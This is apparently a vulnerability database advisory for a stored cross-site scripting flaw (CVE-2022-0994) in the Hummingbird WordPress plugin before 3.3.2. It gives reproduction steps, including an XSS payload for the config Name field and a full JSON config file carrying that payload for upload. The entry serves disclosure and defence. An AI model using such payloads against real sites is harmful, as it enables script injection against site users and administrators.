Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
wpexploitTaurus OmarWPEX-ID:E9DD62FC-BB79-4A6B-B99C-60E40F010D7A
HistoryMar 23, 2022 - 12:00 a.m.

Hummingbird < 3.3.2 - Admin+ Stored Cross-Site Scripting

2022-03-2300:00:00
Taurus Omar
57
hummingbird
admin+
stored
cross-site scripting
settings
configs
upload
payload
config
xss
security document
exploit
varnish cache

EPSS

0.001

Percentile

24.8%

JSON

The plugin does not sanitise and escape the Config Name, which could allow high privilege users, such as admin to perform cross-Site Scripting attacks even when the unfiltered_html capability is disallowed

Go to Hummingbird's Settings > Configs > edit the "Name and Description" and put the following payload in the Name field: <img src onerror=alert(/XSS/)>

Save and Click 'Apply' to trigger the XSS

Go to Hummingbird's Settings > Configs and Upload the following config
{
  "id": 1,
  "name": "<img src onerror=alert(/XSS/)>",
  "description": "Xss",
  "config": {
    "configs": {
      "settings": {
        "advanced": {
          "query_string": false,
          "emoji": false,
          "cart_fragments": false,
          "lazy_load": {
            "enabled": false
          }
        },
        "database": {
          "reports": {
            "enabled": false
          }
        },
        "gravatar": {
          "enabled": true
        },
        "page_cache": {
          "enabled": true,
          "detection": "auto",
          "integrations": {
            "varnish": false,
            "opcache": false
          },
          "preload": false
        },
        "performance": [],
        "rss": {
          "enabled": true,
          "duration": 3600
        },
        "settings": {
          "accessible_colors": false,
          "remove_settings": false,
          "remove_data": false,
          "control": true
        },
        "uptime": {
          "enabled": false
        }
      }
    },
    "strings": {
      "advanced": [
        "Remove query strings from assets - Inactive\nRemove Emoji JS & CSS files - Inactive\nDisable WooCommerce cart fragments - Inactive\nComments lazy loading - Inactive\n"
      ],
      "database": [
        ""
      ],
      "gravatar": [
        "Gravatar cache - Active\n"
      ],
      "page_cache": [
        "Page cache - Active\nFile change detection - Auto\nPurge Varnish cache - Inactive\nPurge OpCache - Inactive\nCache preloading - Inactive\n"
      ],
      "rss": [
        "RSS caching - Active\n"
      ],
      "settings": [
        "High contrast mode - Inactive\nRemove settings on uninstall - Inactive\nRemove data on uninstall - Inactive\nCache control in admin bar - Active\n"
      ],
      "uptime": [
        "Uptime - Inactive\n"
      ]
    }
  },
  "plugin": "1081721"
}

Related

cvelist 1
wpvulndb 1
packetstorm 1
prion 1
nvd 1
patchstack 1
cve 1
zdt 1
cvelist
cvelist
CVE-2022-0994 Hummingbird < 3.3.2 - Admin+ Stored Cross-Site Scripting
2022-04-18 17:10:41
wpvulndb
wpvulndb
Hummingbird < 3.3.2 - Admin+ Stored Cross-Site Scripting
2022-03-23 00:00:00
packetstorm
packetstorm
WordPress Hummingbird Cross Site Scripting
2022-04-07 00:00:00
prion
prion
Cross site scripting
2022-04-18 18:15:00
nvd
nvd
CVE-2022-0994
2022-04-18 18:15:08
patchstack
patchstack
WordPress Hummingbird plugin <= 3.3.1 - Stored Cross-Site Scripting (XSS) vulnerability
2022-03-23 00:00:00
cve
cve
CVE-2022-0994
2022-04-18 18:15:08
zdt
zdt
WordPress Hummingbird Plugin < 3.3.2 - Stored Cross-Site Scripting Vulnerability
2022-04-07 00:00:00

EPSS

0.001

Percentile

24.8%

JSON
Related for WPEX-ID:E9DD62FC-BB79-4A6B-B99C-60E40F010D7A
cvelist1wpvulndb1packetstorm1prion1nvd1patchstack1cve1zdt1